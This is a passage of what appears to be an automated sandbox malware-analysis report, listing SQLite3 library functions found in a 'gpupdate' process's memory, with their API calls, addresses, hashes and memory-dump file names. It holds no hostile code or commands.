                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_create_function_v2sqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_mutex_leavesqlite3_vmprintf
                                              • String ID:
                                              • API String ID: 946922136-0
                                              • Opcode ID: ec61dce4aac5bf064e2d813a015ee24d074fa00258983a499e27a62e74a21dc5
                                              • Instruction ID: 10f554fde51a2c8c1b9c3fbb0895dd083781f87063305d20e8142e4c73fae8df
                                              • Opcode Fuzzy Hash: ec61dce4aac5bf064e2d813a015ee24d074fa00258983a499e27a62e74a21dc5
                                              • Instruction Fuzzy Hash: 651100B4A083568BD7009F69C48075ABBE4EFC4358F24C82EE8888B304D3B9D9458B92
                                              Function 61E96BE3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_initialize.SQLITE3 ref: 61E96BEF
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E96C09
                                              • sqlite3_realloc64.SQLITE3 ref: 61E96C3E
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E96C66
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_realloc64
                                              • String ID:
                                              • API String ID: 3457859928-0
                                              • Opcode ID: cde567924e67dc3203f528c2fa0c88dbff0191aa3b4fc80953e1af9f1b266616
                                              • Instruction ID: ab483c8b7b56ba8f4f3c2a13603354792b81e4b49feb3341a41efa0e23f640c2
                                              • Opcode Fuzzy Hash: cde567924e67dc3203f528c2fa0c88dbff0191aa3b4fc80953e1af9f1b266616
                                              • Instruction Fuzzy Hash: DA014C70A08A829BD714AF78C5C07197BE6EF8E358F248929E548CB301E335E456C791
                                              Function 61E2EEF7 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 3222608360-0
                                              • Opcode ID: ecde39f1953c6dd65c87d373d8d8742c6aa75a4edb84ea3fc348a120379a2357
                                              • Instruction ID: b6e170203a91a71df0b67a1ff80bdb1bfedc44872904bdf8cb2656088387df15
                                              • Opcode Fuzzy Hash: ecde39f1953c6dd65c87d373d8d8742c6aa75a4edb84ea3fc348a120379a2357
                                              • Instruction Fuzzy Hash: FA01E275604A669FDB00EFB9C4D4949BBF0FF85718B298958E8988B305E330F991CBD1
                                              Function 61E0AE81 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_free.SQLITE3 ref: 61E0AEB9
                                                • Part of subcall function 61E0ACC0: sqlite3_free.SQLITE3 ref: 61E0ACE1
                                              • sqlite3_free.SQLITE3 ref: 61E0AECC
                                              • sqlite3_free.SQLITE3 ref: 61E0AEAE
                                                • Part of subcall function 61E0A05C: sqlite3_mutex_enter.SQLITE3 ref: 61E0A07B
                                              • sqlite3_free.SQLITE3 ref: 61E0AEF2
                                                • Part of subcall function 61E0AE57: sqlite3_free.SQLITE3 ref: 61E0AE68
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_mutex_enter
                                              • String ID:
                                              • API String ID: 3930042888-0
                                              • Opcode ID: 335af522b4e23a4649a49eedd4091b00b55534a3f4b24d469f10b13aa4c22cae
                                              • Instruction ID: e4e146c91335518fe5238798d55434bd691c2d06a03f752d5f3b2dae9301ba81
                                              • Opcode Fuzzy Hash: 335af522b4e23a4649a49eedd4091b00b55534a3f4b24d469f10b13aa4c22cae
                                              • Instruction Fuzzy Hash: CB017C3094078DCBDB00EB78D8C895EB7B4EFC4309F208869E4548B320D735D8668B91
                                              Function 61E1802F Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E18044
                                              • sqlite3_result_error.SQLITE3 ref: 61E18074
                                              • sqlite3_result_double.SQLITE3 ref: 61E1808A
                                              • sqlite3_result_int64.SQLITE3 ref: 61E180A2
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                              • String ID:
                                              • API String ID: 3779139978-0
                                              • Opcode ID: dcc355640467e7dfedf32d77615ca98bd817bd673d8c183234ae71bd51a3b2e6
                                              • Instruction ID: b5a63a120e52a206943c8ebdc8bd94f7a36f90ede017a08d2ab14b8f8e907813
                                              • Opcode Fuzzy Hash: dcc355640467e7dfedf32d77615ca98bd817bd673d8c183234ae71bd51a3b2e6
                                              • Instruction Fuzzy Hash: 500121B040C7499EE700AF64C586B1ABFE0AF8431CF25C99DD4D90B3A5C735C484DB82
                                              Function 61E3E952 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_vmprintf.SQLITE3 ref: 61E3E96B
                                                • Part of subcall function 61E3988E: sqlite3_initialize.SQLITE3 ref: 61E39895
                                                • Part of subcall function 61E3988E: sqlite3_str_vappendf.SQLITE3 ref: 61E398E0
                                              • sqlite3_mprintf.SQLITE3 ref: 61E3E989
                                                • Part of subcall function 61E3A372: sqlite3_initialize.SQLITE3 ref: 61E3A378
                                                • Part of subcall function 61E3A372: sqlite3_vmprintf.SQLITE3 ref: 61E3A392
                                              • sqlite3_free.SQLITE3 ref: 61E3E995
                                                • Part of subcall function 61E0A05C: sqlite3_mutex_enter.SQLITE3 ref: 61E0A07B
                                              • sqlite3_free.SQLITE3 ref: 61E3E99D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_entersqlite3_str_vappendf
                                              • String ID:
                                              • API String ID: 2498652501-0
                                              • Opcode ID: a102296416bfa68d59e7df76285e6bd84e349dbbc0578264bf3dde38404ba3c3
                                              • Instruction ID: ca63b08ed76dfaaeb66be95c0ba8c46a62cc738907e843e7bb6743df7804f5b8
                                              • Opcode Fuzzy Hash: a102296416bfa68d59e7df76285e6bd84e349dbbc0578264bf3dde38404ba3c3
                                              • Instruction Fuzzy Hash: E2F030715087699FD700AFA9848046EBFE8EEC8754F15C82EE888C7300E771D840C792
                                              Function 61E96C75 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_initialize.SQLITE3 ref: 61E96C7C
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E96C94
                                              • sqlite3_free.SQLITE3 ref: 61E96CA1
                                                • Part of subcall function 61E0A05C: sqlite3_mutex_enter.SQLITE3 ref: 61E0A07B
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E96CBD
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_initializesqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1885817404-0
                                              • Opcode ID: 437130530e84aa5073bc5bb52e5dbaf69aa5e510d0fb56b9e91465c0a9cdac89
                                              • Instruction ID: a11c7e41c4d8949fa43f31eed451bf743220b964c628346a35b4b3f4078e973b
                                              • Opcode Fuzzy Hash: 437130530e84aa5073bc5bb52e5dbaf69aa5e510d0fb56b9e91465c0a9cdac89
                                              • Instruction Fuzzy Hash: 4EE04FB09087878BDB007FF8868531977F9BF5A31DF25482CD5888B301E779D4548792
                                              Function 61E27340 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 491COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_strlike
                                              • String ID: \$`
                                              • API String ID: 933858916-649956920
                                              • Opcode ID: e711cd4842ec77d66f97279f2ab796596537c8bfdae65a6e1deab95d8432c347
                                              • Instruction ID: b38aa1b74856ed79cc073f833bbc24c713a75f4868861c07b8c7294c65d69729
                                              • Opcode Fuzzy Hash: e711cd4842ec77d66f97279f2ab796596537c8bfdae65a6e1deab95d8432c347
                                              • Instruction Fuzzy Hash: 6222A3B4A046598FDB40DFA9C891B9DBBF1BF88304F248429E859EB344D739E942CF51
                                              Function 61E834A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E834EB
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E839D9
                                                • Part of subcall function 61E685F1: sqlite3_strnicmp.SQLITE3 ref: 61E68663
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                              • String ID: ha
                                              • API String ID: 100587609-887943521
                                              • Opcode ID: 41b38abb5c32f43ddb047cc5ebd87786e02cd2a4f18d87702c67bc6c9a114826
                                              • Instruction ID: 6b3c82ae3ad12136eb73fbb8fbe48f43007d2b205779326a28622a1a7766563e
                                              • Opcode Fuzzy Hash: 41b38abb5c32f43ddb047cc5ebd87786e02cd2a4f18d87702c67bc6c9a114826
                                              • Instruction Fuzzy Hash: 4061E574A052598FDB51CF29C88478ABBF0BF89318F20C5A9D84DAB350D735DA95CF81
                                              Function 61E06E29 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_strnicmp
                                              • String ID: '$null
                                              • API String ID: 1961171630-2611297978
                                              • Opcode ID: 3337d7ec81bffc4abd49bc6bcf73c99ada0dff76e3dea666f0a1c4664a9702c3
                                              • Instruction ID: d76e407c9668067e0fd23efdf5814cfec88d343d7d9094c7a404ff5b20bce802
                                              • Opcode Fuzzy Hash: 3337d7ec81bffc4abd49bc6bcf73c99ada0dff76e3dea666f0a1c4664a9702c3
                                              • Instruction Fuzzy Hash: 18312960A492C74EFB008E64C4A5395BBD36B8D70EFB8C168E4444A286E625DDE68301
                                              Function 61E2ED17 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E2ED51
                                                • Part of subcall function 61E2DD97: InterlockedCompareExchange.KERNEL32 ref: 61E2DDB7
                                                • Part of subcall function 61E2DD97: InterlockedCompareExchange.KERNEL32 ref: 61E2DDFE
                                                • Part of subcall function 61E2DD97: InterlockedCompareExchange.KERNEL32 ref: 61E2DE1E
                                                • Part of subcall function 61E2DD21: sqlite3_win32_sleep.SQLITE3 ref: 61E2DD79
                                              • sqlite3_free.SQLITE3 ref: 61E2EE1C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                              • String ID: winDelete
                                              • API String ID: 3336177498-3936022152
                                              • Opcode ID: 784250bf7d22a0fce61affc8231a80c48f2055fcc310021d9cee852da27dab35
                                              • Instruction ID: edef045b2a7b6e9c8e001edcc49e4add2c7ec37bc867d864c05802efdac6cc2b
                                              • Opcode Fuzzy Hash: 784250bf7d22a0fce61affc8231a80c48f2055fcc310021d9cee852da27dab35
                                              • Instruction Fuzzy Hash: 33319570A04E268BEB115FBBC8A46AE7BB5FF85358F20C929E95097350D734C8418B92
                                              Function 61E97910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: Virtual$ProtectQuery
                                              • String ID: @
                                              • API String ID: 1027372294-2766056989
                                              • Opcode ID: ba655096dbc2bd596bf277f9358c104a1f72452b7975ce975276469b9abe65be
                                              • Instruction ID: 46cb9f1e7fa2a1f6e089d0ae0eaa0c17335f5d3967c0abbc0cea6dc56fa08a1c
                                              • Opcode Fuzzy Hash: ba655096dbc2bd596bf277f9358c104a1f72452b7975ce975276469b9abe65be
                                              • Instruction Fuzzy Hash: D0314AB29147528FE710DFA8C58461ABBE0FF85354F65CA1CD89897350E730E988CB95
                                              Function 61E1886D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E18887
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E18936
                                                • Part of subcall function 61E17A8A: sqlite3_mutex_try.SQLITE3(?,?,?,61E17B0A), ref: 61E17A2A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_mutex_try
                                              • String ID: &
                                              • API String ID: 2389339727-1010288
                                              • Opcode ID: 2d4c1cdd55f74a2b203540e46116c37d8853a6d44b6db85ca241b2b4c59e3ee8
                                              • Instruction ID: 9b5167e6530fc37bce6365facf07618661ce0ee88709b41a6203aa8e50e2a922
                                              • Opcode Fuzzy Hash: 2d4c1cdd55f74a2b203540e46116c37d8853a6d44b6db85ca241b2b4c59e3ee8
                                              • Instruction Fuzzy Hash: 0B214A34A08246CFDB04DFA8D481D5AB7B2FF89358F68C529ED588B708D770E991DB81
                                              Function 61E2DA7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E2DA98
                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E2DAA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                              • String ID:
                                              • API String ID: 3265351223-3916222277
                                              • Opcode ID: a188a3ce80d333f4b0207776571d4023480ab273b9ab0f1bbf7cf504dfaa0f6b
                                              • Instruction ID: 5db6e47f903cc77570d1bfab329e68307432f8a9050cf864f5cff105dfa6bed1
                                              • Opcode Fuzzy Hash: a188a3ce80d333f4b0207776571d4023480ab273b9ab0f1bbf7cf504dfaa0f6b
                                              • Instruction Fuzzy Hash: F211A1B4A083858FDB059FA9C0D175A7FF0FF49308F248099D9948B349D7B1C9A4C792
                                              Function 61E2297D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E229C2
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E229FE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
